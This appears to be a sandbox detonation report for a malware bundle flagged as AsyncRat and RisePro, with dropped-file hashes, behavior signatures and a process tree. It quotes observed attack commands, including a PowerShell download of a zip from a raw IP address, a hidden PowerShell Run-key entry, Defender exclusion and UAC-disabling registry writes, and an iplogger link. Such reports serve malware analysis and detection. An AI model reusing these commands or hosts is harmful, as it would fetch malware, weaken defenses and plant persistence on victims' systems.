memory/4696-35449-0x00000000064A0000-0x00000000064C2000-memory.dmp
memory/8332-35701-0x0000000005EF0000-0x0000000005F00000-memory.dmp
memory/8332-35738-0x0000000006130000-0x000000000618A000-memory.dmp
memory/9156-37341-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FEHPE754\YBNA2NLU.txt
| MD5 | 1207bc197a1ebd72a77f1a771cad9e52 |
| SHA1 | 8ed121ff66d407150d7390b9276fe690dd213b27 |
| SHA256 | 260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476 |
| SHA512 | d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\a31c5d3e-4d7c-4a79-87cc-b34b2b65585f.dmp
| MD5 | 582e2eef0a0ca67ab89a8cc397aed777 |
| SHA1 | 7500be434f0637cc177baa6688e2ba0850bead5a |
| SHA256 | afcf6281ecb8780461d85fabd4b3da6e1b00a0ad03072bbb895007f6e9653813 |
| SHA512 | 9b44030e22bb3bacb8ac75ae102239f0181e4c5f27e3256eeb2400ffab038b64414491fccaf600f51cbb058fd403ac5bc3ee7d15ad45749ac3342fdb61b5f168 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
| MD5 | dcc368463a550e032eea38ee9d7555c7 |
| SHA1 | 30080f8e6b27fbf3136e8e0c960b1a64361c568d |
| SHA256 | aea74d3ebef21ecdc2661de9dc5fa1ceb5d1280e038ac0f707c052731671c1ff |
| SHA512 | db698586ce5bce418ed8603b532bd56d826ba3b184763289cb164215f780436eb72478be1ba98daea8ffabc610e591858daf7b7b6494d603b864ec4c5c1c2e18 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 23757ed07e48d44307286952c68ec805 |
| SHA1 | c592ce51e6b0a2ac953d578a02e9b92ca6927a82 |
| SHA256 | 7ea39c8d61be992783d37ddec9447b4e68dcfbb7a373a5d8770ee6cb0604abca |
| SHA512 | c2270da887f919318759872bffda13de30ad002aa0b1a8382fff0c9ed35e04e82b886b240a73257150a92cba2fa326d20302bf7c77e8c6e7d86d0e0e2bf7445c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\962635be-7541-416b-b736-784112672d14.dmp
| MD5 | cab40c778591e0d16f4a0fe7db4a196f |
| SHA1 | ceb06e15c8216de166b77440ca0e412e7eae5a75 |
| SHA256 | e75ae32efa2f2173c402481acee1dc594b0d9848f01e67e6e4389a9de7733ee0 |
| SHA512 | 653d2bd0d62ef6d0d11f78f6f2d20d9763c2b9984dc1df1c7ce516e821087bbe82a041da0a7140d7fe1cc6a5b8bbf98a2542ff39655c985edf3bb73e8339671c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d747ac4b-eee4-446f-a9fe-e4afa68505e5.dmp
| MD5 | 5450c4817953a6ca83b47c0fbcff1240 |
| SHA1 | f8c77b365cf834a769e9d411d8de09e59ed8eee4 |
| SHA256 | 1deb85bbf492217026993fa86c1159075fee1bb74989795db5f7a49f0edc105c |
| SHA512 | d09993cb83eb403093bcc30852f0012a9254344aa6375c89ff91ae38706178a6e008cf8857f6844e5706ca3833232055c524b2a5905d1b27e27dd24fd28f6de6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 59ccf729073b75b6510f628699d140a1 |
| SHA1 | 786fcc314a1a174bd80b10586bcceaf06806d98a |
| SHA256 | 7b2b8aa44ad55806629151b1a2f3628268898bfcba2ea82bb79359a888d4e34d |
| SHA512 | d5753993125dd9f15bd3fe8a6d601560a6cad57a3a03b44731fbb4dbab5bd225e62bc3b2a639498d1e919a1087c72a3f1989a5f2112b7fcce37382e2bc4161d7 |
C:\Users\Admin\AppData\Local\Temp\7zSC3AF.tmp\__data__\config.txt
| MD5 | a105a47c98f80b8852960c96b87de57f |
| SHA1 | 564e75ca9dcf70541b6f89622f1728387b96571f |
| SHA256 | 6091181db52b0b2379c6d23966f50a0fc2109d2536f613f1235465774106e9f2 |
| SHA512 | 50a62a5d9cf35833bd9162021cb29644cd455d725cd7b54b1cb1e364aa8b367aa233eba42fc976242ec538103344c8986c816e7e269aefe3873298ccc843e664 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 4bde8ffd446ee8be6d27378ca601fa3f |
| SHA1 | d133ca6f3dcdbb8f93f746ab8c295529636e04c5 |
| SHA256 | e8422af58d4fe92d7519b5f99181fcf4c8a1e79538ba155f31d4e1ff840f2a6d |
| SHA512 | f7ac25f537e14e26a95cfab2d2c648e6c68625598ea2c7371d3ac54f615305b32dfc19433cde0593d9a7c0672d79cffab6671b51a5b3678d10662f9585eb336e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b46c82f0-d048-41b6-86f7-3a7da1ae46bb.dmp
| MD5 | 5b4bfadc73ae24f53533f3c9caebd270 |
| SHA1 | 13ece8dd053ca241b76d856b60d0fa3028fc09c2 |
| SHA256 | 512bdf6cd6a829b2ecd6ac34dc1e1310ae3f6b5e47b9f384ca8af87bb86a9eb2 |
| SHA512 | 2af5bdeb15b6455c60db86d87a770c20afc30ce69b69d7bdf6a103317893e86fcfeb54fa8fde4c06afe235d25fecfc64b8b66559616941b2c462374b8b447419 |
C:\Users\Admin\AppData\Local\Temp\edge_shutdown_crash.txt
| MD5 | 06d49632c9dc9bcb62aeaef99612ba6b |
| SHA1 | e91fe173f59b063d620a934ce1a010f2b114c1f3 |
| SHA256 | e79e418e48623569d75e2a7b09ae88ed9b77b126a445b9ff9dc6989a08efa079 |
| SHA512 | 849b2f3f63322343fddc5a3c8da8f07e4034ee4d5eb210a5ad9db9e33b6aec18dea81836a87f9226a4636c6c77893b0bd3408f6d1fe225bb0907c556a8111355 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 8dc775fcc7fc81710c5f26daf1901c71 |
| SHA1 | c9f32642bc6d7db706b126d48ce86e9134273f55 |
| SHA256 | f723c44c14936b8aad6f1bb388c0219a234e642cf52099c3da78bbf17569ccf4 |
| SHA512 | 0f34e3fe566f1de14aa8f6d0a212f64dbed0308d9ab1d2caf4adef07ac102bbe411b972c1f37e31fc64e069d324ad8a1ba9859bed20709c2aff096dbed628f2a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\11a849af-9d2e-46d1-a182-2bfac53a4f5a.dmp
| MD5 | 9f6d7dc7e6b1fb0f9649775b95c4e07a |
| SHA1 | 6fc12d3f9473c375dd6cb2dd35e7eb99d2b1b634 |
| SHA256 | 086c556d7a1cc521ec86d44248c373bb3d62529c41b2e8e94de53828f3cd35f9 |
| SHA512 | eba87c275ae4da13f236c592e84b2a06f1952d745a12b964afaad19c9cb08b69d6de00f0936497ef45fbb4465cb01e96fe52cdaca44b60068dca41cd9e27992e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | aaeee5f70ce2e30a401338086fb772a7 |
| SHA1 | 5714eeda9ef60225da30d5fa151870ec273c9b7a |
| SHA256 | 5526a176c74d9c0c4ea21210e989855862642e67bbe5e5cbe874aa6f1179ffa9 |
| SHA512 | 5a01672663374484e188305cc88fc81bb14cdf1931a5bbbdbe0184e72dddc71b9d392e18eb6044d3cd0e1061c9f71d42b8ee741795996910bda74a4c4eec7885 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ae019e6a-2237-437f-8cbf-796ab0acec8d.dmp
| MD5 | b4b576f2c481d1f22c4be62b2da04259 |
| SHA1 | 67a0031e7fc767c7a9b3d8ca613eb3c7ea60079b |
| SHA256 | cc2adb70df558d0da25b8f8b12c463c9b8f887a61889e72d59a6fe87b1718a26 |
| SHA512 | 2cdd9af705e759482d8f926d8d4b8bf048f60d91ebee710ea07634522c6e799c0cb795eb2a223b789825f133f6cef27538866ba63d12ba23ef2a287527bb385a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\bc6ca965-50e3-4d44-9460-280cc8d57f7b.dmp
| MD5 | 14aa8a7707873725da7f38273c2f1111 |
| SHA1 | 14238edc21e4b8f7abfdcc5fb8c94a6ce1969b8b |
| SHA256 | 9225b3d331b76b44f26ea1820e7c2703a0eeecbc4981d94d13cb058da38c260a |
| SHA512 | f0833f4f72f67e69758f27ea061f87252a16094dcc140f10d5e086f5b4ef226239882f717dbb8f0845a85b7ccc1709e5dda5444cbb184670064c00cbbee31458 |
C:\Users\Admin\AppData\Local\Temp\1717260008_00000000_base\360base.dll
| MD5 | b192f34d99421dc3207f2328ffe62bd0 |
| SHA1 | e4bbbba20d05515678922371ea787b39f064cd2c |
| SHA256 | 58f13d919f44d194827b609b6b267246abc47134bb202472c0dfe033b9d7ed73 |
| SHA512 | 00d4c7a0a0097eb4b31a71a0eaf6ff0d44619f77a335c75688565e34e6d7f4fb6c258917457d560c6b0a5077603845ce012e01d9862e87fb5327d7f8da970f95 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\0c5683f4-2db8-4245-9b86-05caf8cf8fea.dmp
| MD5 | ac1201a590c039da60c4a1647261c9e8 |
| SHA1 | 57def3700aa75294057ee552f4e9bd635be3f88e |
| SHA256 | 2ebc46dce31e968817b03c65bdc3dee290198aa298665f8d10ad2455b0219988 |
| SHA512 | d6c88063c2dd76635634294d53ac6e851549f33f99c808d6561294e16ff492a63985b6b9d5b4298e4ed50207df71f864e7426a08d1e758e04ebf760d6cca6b34 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | e6fc5c220a7549201da0526171e3eaa1 |
| SHA1 | 8e25b308619170a158f52cb81669601281c2e0c7 |
| SHA256 | 467beecf043bca873160f46b98aa7ed937fc5b319434299f8d1e9d700cba59a3 |
| SHA512 | 13512ce31d25771a09f694469b50fd08e65f16a33a94903201aef2ca97f9f6a0f715c2ecdb6e589dfabe3d1c84486556152331a2b795b9b6bb55d7cf474f1bca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\62576b4e-8c08-4b65-bc1f-bbd70c7d43a5.dmp
| MD5 | 86db55f6368b765c9de54aa21b780182 |
| SHA1 | 3401d914de7b7eb5c2c329771fae24a757285347 |
| SHA256 | 99452036e0bc681bde6c38c35cd12577deacfafe6dc5f00d67f7656af0d84469 |
| SHA512 | 0348dca4f55c4dc38c4a0af3e4b5c9c8f6677ace44801248f24d27efd9d99b1fb9a9d21cb2af87877bd45398b241423f494df6d0c013d08c1696b250a0ac8913 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 9118dedfae4fcf8efc36aa9158754481 |
| SHA1 | 7d1ad50d020fa4d0dee33446b497b337b08c0a0b |
| SHA256 | 583e5f2be28ca0737b5b550ad9fd180b6af6614c6c310366603ce1cc1cfc260c |
| SHA512 | acd1864a77a6cfb1ca8bdaacbe302068e0a6c29bd774678c7bcf48c09ad5502a0f673bde4e6101517bc243e23861b1d275bc588c35be56544c8ea283d958dde0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 2b8a63d228567d690ae020eddd64779e |
| SHA1 | 1a67edc6ee65d718155b8f4cbc7c172cd6e9bf6f |
| SHA256 | 83b076b339a25a53b36a2e43e274885536b95d2e794fc10806d6f1f9b267fc81 |
| SHA512 | 032ede76e63be796af5e94a0d3c2afa49df4e140aeaf9d9d4c65e169ec700bf8a5e4f8df2c4bd4219befb2808f95d74b404d985f9d136a5e4362f279f75d875a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\8684c4e0-db23-44af-80c6-2ed2b510fff1.dmp
| MD5 | 0230be06396b20bcaa0a2a5840844fd7 |
| SHA1 | b918ecaac28d62901e57c5131c88f099321ae40c |
| SHA256 | 3d5611c7ea160bf49f7f972dc760788d39bf11d8b851f51f0316224a52ef7764 |
| SHA512 | 7b451f55e7e855c8bc96fcef578459c0fb012ff981864ef35b52833e027e9aacd9291dce930f5e781659e8efda38ec663e1588a2876283d2b0e882638f4e2bc0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 70b45eaabba392d71cfe0a6229021771 |
| SHA1 | 5c4cfe138c9a3c207e9709374a4210f7b1039c74 |
| SHA256 | 2a117ca1ce3afe8d4f79f665d65c372a37a355938d2187dd8ef96815ecd75beb |
| SHA512 | 8504253aa4a5448535dd5d6a07809396d2b6f9920648ef7b88291cbbee779459adf7ce0eca7535fa7b81c4f29cc512a65fad9072f43f254f173144c1eec88c53 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9c572f74-fa5b-4714-ad0b-992871097001.dmp
| MD5 | 97d1eea0fdf000e72ac1a53f263bc7ce |
| SHA1 | 022778b22cf3bfe1be6d50543eefa6ac8438a60e |
| SHA256 | 513947bac118c71c5ca2acda240320e971749725c47c7b241339925fd37f5343 |
| SHA512 | 5af6bbb92a7ade69bdbd0badbfd5f5c1f01cb45e2442268429694a23cfa123dfe31d86246718ec0afd0ade7a0928a10540ed6be7d2c9b7daf1f97462b40c0613 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d39cd378-2e9d-40c3-829b-10dbc70ae7ba.dmp
| MD5 | 272134cd5794aca913fcd0aa0f11432b |
| SHA1 | b74835bc19d3025e0c25e949da26db65fae379d1 |
| SHA256 | 6f44f0eccb0b6d1a83cbd398252afaf7ff4bd3fdb936938523f99c53cdcaa54b |
| SHA512 | 873b9a04c6b0fce7bdffab076db7f708b547ea7adc930805a512ab469eea9a30a880e589a64d6eaae9ff11401eb82a05c3170a6eed4062addc3d96447642325f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\watson_metadata
| MD5 | 50c3824a5ce311fb8de489d2c906722b |
| SHA1 | 646701304da4d5055030dea7c4db4166ea8b125b |
| SHA256 | ec26cd69fafae4bfd96c6bc6f92b65dcb83d6434cdddd77cdcf1d33d9f1f3c3d |
| SHA512 | 32e1e36bb4313995c880eaf6344717898417809f1b1ee7b95612157bfb7aee2c223dcc28a3c37e4460e42703b21c4804faecfb8a0b8da4013a4f1a53f7d1665b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 018d785f203acfd90f73467bb56b535f |
| SHA1 | 182cd16fd122fc520dcd92fd77b14acc42e620ab |
| SHA256 | 2d39371ce46c3daacf146ecc00b9348c620f21002d729048f53f6b3a1c67e1a9 |
| SHA512 | 7cef83a5ceb9cc276b49bacf3e52b93dcda717a18588f13435931b1374893542d0157b8735c0ffcdee02e74c1d73150f7f41d0e55a1925ad1fcb51dd0b3691c0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\968cba5e-556a-45e9-afbe-c33e1877f79e.dmp
| MD5 | 1eccdc25907111a2f957581b2ecba0b9 |
| SHA1 | ac95bbcd7c8f80b961ebe5b9a5c6ae0c6fb350db |
| SHA256 | f13d138a4492b54358c1678ba4e0327e05248cf0b0bf5e27aba931dcd57f8bf3 |
| SHA512 | 722c63667afe0d85bf18dbef89b92771b315368f1bf969ddedd1788c99c1a3efe90c87106936a453ca54e121240985135eb75b6c7488eca8d76293466ad53209 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\50b43453-f262-471a-96c6-9c9f4e273331.dmp
| MD5 | 4a4d948c7e58b8ab44ec3c8185d6b9f4 |
| SHA1 | 581e7b21b8bcd3f8727f33bf2aed152e98957eec |
| SHA256 | 2ae2be26fe6b4e9698420ac43d741b096f2a06c8b1f45b013f9b7bab68c6733c |
| SHA512 | c0df4c9336811299a5416af16b9336f383e488727a36897cb1b6008173095c69b344b92a89efc61be6e8865aeff99e8a400330375a979a57e3ae62a6d6140cd2 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 15:54
Reported
2024-06-01 16:36
Platform
win10v2004-20240508-en
Max time kernel
102s
Max time network
106s
Command Line
Signatures
AsyncRat
RisePro
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\a\New.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\ld.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\a\New.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S} = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" ..." | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\volumeinfo.exe'\"" | C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4036 set thread context of 5632 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5488 set thread context of 660 | N/A | C:\Users\Admin\AppData\Local\Temp\a\New.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe |
| PID 5544 set thread context of 5984 | N/A | C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3340 set thread context of 3364 | N/A | C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe | C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe |
| PID 5488 set thread context of 5856 | N/A | C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\victor.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\ld.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\ld.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | C:\Users\Admin\AppData\Local\Temp\a\ld.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3404,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
"C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
"C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe"
C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
"C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
C:\Users\Admin\AppData\Local\Temp\a\New.exe
"C:\Users\Admin\AppData\Local\Temp\a\New.exe"
C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
C:\Windows\SysWOW64\tar.exe
tar -xf putty.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
